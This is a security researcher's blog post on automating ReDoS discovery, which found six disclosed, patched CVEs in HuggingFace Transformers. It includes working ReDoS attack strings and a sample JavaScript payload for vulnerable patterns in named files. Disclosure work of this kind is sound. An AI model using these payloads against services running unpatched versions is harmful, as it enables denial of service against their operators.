6 CVEs and $750: Automating ReDoS Vulnerability Discovery with AI

The idea started while browsing Huntr’s hacktivity feed. I saw a ReDoS vulnerability reported in HuggingFace Transformers and wondered how many more might be hiding in there. Manually reviewing regex patterns sounded tedious and I only have the attention span of a Skink, so naturally I spent time building a tool to avoid doing it myself. That laziness paid off — 6 CVEs and $750, to be exact.

What Even is ReDoS?#

Before we dive in, let me explain what ReDoS (Regular Expression Denial of Service) is for the uninitiated.

Regular expressions (regex) are those cryptic strings that look like your cat walked across your keyboard, but they’re actually incredibly useful for pattern matching. The problem? Some regex patterns are written in ways that cause the regex engine to go on an existential crisis when given certain inputs.

Here’s a classic evil regex:

pattern = r'(a+)+$'

I mean what could go wrong here? Try matching this against the string "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!" and watch your CPU scream for mercy.

What happens is catastrophic backtracking — the regex engine tries to match the pattern, fails, backtracks, tries again, fails, backtracks… you get the idea. The time complexity can be exponential, meaning a carefully crafted string can freeze your server for hours. Or forever.

The Grand Plan#

I had this idea: what if I could automatically scan codebases for vulnerable regex patterns? Sounds simple enough, but regex parsing is surprisingly hard. There are ReDoS detection tools out there like redos-checker and recheck that tell you if a regex is vulnerable and even provides an attack string. I only needed some way to parse the regexes in the codebase and feed those into a detection tool.

So I did what any brain-rotted developer does in this Dystopian Intelligence Era — outsourced my thinking to ChatGPT.

Together, we built two main scripts:

1. The Scanner (`scanner.py`)#

This script:

Walks through a project directory
Finds all Python and JavaScript/TypeScript files
Extracts regex patterns from functions like re.compile(), re.match(), re.findall(), new RegExp(), and literal /pattern/ syntax
Pipes each pattern through recheck

Here’s a snippet of the regex extraction logic for Python (the actual script is about 350 lines):

# Find re.compile() patterns
compile_pattern = r're\.compile\s*\(\s*([rfb]?[\'\"]{1,3}.*?[\'\"]{1,3})\s*(?:,\s*(?:re\.)?([A-Z|\s\|]*))?\s*\)'

# Find re.search(), re.match(), etc.
re_funcs = r'(?:search|match|findall|finditer|split|fullmatch)'
re_func_pattern = f're\.{re_funcs}\s*\(\s*([rfb]?[\'\"]{1,3}.*?[\'\"]{1,3})'

Yes, I’m using regex to find regex. We’ve gone full inception. Leonardo DiCaprio would be proud.

2. The Verifier (`verify.py`)#

The scanner can have false positives, so the verifier script:

Parses the scanner output
Takes each “vulnerable” pattern and its attack string
Actually runs the attack in a controlled environment using Node.js
If the regex takes longer than 10 seconds to execute — boom, confirmed vulnerability

The Hunt: Transformers Edition#

With my shiny new scanner ready, I needed a target. HuggingFace’s Transformers library was perfect:

Huge codebase with tons of regex
Critical infrastructure for the AI/ML community
Covered by Huntr.com ’s bug bounty program

I pointed my scanner at the Transformers repo and let it rip:

$ python3 scanner.py transformers/ | tee scan-result-transformers.txt

Found 1049 regex pattern(s) in 397 file(s):
# ... rest of the 8000 lines of the output ...

$ python3 verify.py scan-result-transformers.txt

Found 38 potentially vulnerable patterns

Testing regex: /<.*?>/
Attack string: '<'.repeat(54773) + '\n<>'

[VULNERABLE] Pattern took longer than 10 seconds to complete

--------------------------------------------------------------------------------

Testing regex: /config\.(.*)\.json/
Attack string: 'jsonconfig.f'.repeat(15812) + 'json'

[VULNERABLE] Pattern took longer than 10 seconds to complete

--------------------------------------------------------------------------------
# ... more patterns tested ...

The feeling of seeing [VULNERABLE] pop up in red after a 10 second hang was oddly satisfying. The laziness indeed paid off.

A few minutes later, I had a treasure map of vulnerable patterns. Out of all the findings, I selected and verified 6 distinct vulnerabilities with real impact potential. Now came the tedious part — writing up reports on Huntr for each of them😵‍💫.

The Vulnerabilities#

Here’s what I found:

CVE	Location	Pattern	Report
CVE-2025-3263	`configuration_utils.py`	`config\.(.*)\.json`	Report link
CVE-2025-3264	`dynamic_module_utils.py`	Nested `try/except` blocks	Report link
CVE-2025-3933	`processing_donut.py`	`<s_(.*?)>`	Report link
CVE-2025-5197	`modeling_tf_pytorch_utils.py`	`/[^/]___([^/])/`	Report link
CVE-2025-6051	`number_normalizer.py`	Long sequence of digits	Report link
CVE-2025-6638	`tokenization_marian.py`	`>>.+<<`	Report link

Each of these patterns could freeze a process when given a malicious input. In a production environment where Transformers is used to process user inputs (think chatbots, model loading from untrusted sources, etc.), these could be weaponized for Denial of Service attacks.

The Payday#

I reported all 6 vulnerabilities through Huntr.com , which is like HackerOne but specifically for AI/ML and open source projects.

The process was smooth:

Submit the vulnerability report with PoC
Wait for triage (usually a few days)
Get confirmation and CVE assignment
💰

Final count:

6 vulnerabilities reported
6 CVEs assigned
$750 in bounties ($125 each)
1 very happy me

Not bad for a few hours of work. Although, let’s be honest, the real hours went into reporting the vulnerabilities. But that’s how it is.

Sample Attack#

Here’s one of the simpler attack strings:

const regex = /config\.(.*)\.json/;
const payload = "jsonconfig.f".repeat(158120) + "json";

console.time("DoS started");
payload.match(regex); // This will take FOREVER
console.timeEnd("DoS ended");

This is what it feels like to be a frozen server.

What I Learned#

1. Automation is king. Manually auditing thousands of regex patterns would have taken weeks. The scanner did it in minutes.

2. AI is a force multiplier. ChatGPT helped me iterate on the scanner logic incredibly fast. It’s making us more effective (and a bit more dangerous). But AI is a double-edged sword, imagine Claude-generated code for critical features being shipped without proper testing.

3. Big projects have low-hanging fruit. You’d think a project maintained by a billion-dollar company would be squeaky clean. Nope. The attack surface is just too large.

4. ReDoS is underrated. It’s not as glamorous as RCE or SQLi, but when your ML inference server gets frozen because someone uploaded a sneaky model config file, you’ll wish you took regex security seriously.

The Tools#

If you want to try this yourself, here’s what you need:

recheck — The ReDoS detection engine
A target — Pick any large open source project and go hunting
Patience — Not every finding is exploitable in practice

Closing Thoughts#

This was a fun project. I got to combine my love for security research, automation, and AI while making some money on the side. The best part? Those 6 vulnerabilities are now patched, making Transformers safer for everyone who uses it.

Props to the HuggingFace team for quick fixes and being responsive throughout. And if you’re thinking of trying this yourself — go for it, there’s no shortage of targets.

If you’re interested in this kind of work, the barrier to entry is lower than you’d think. Some curiosity, a little patience, and a target — you’re already thinking all the time, why not put it into something like this?

Thanks for reading!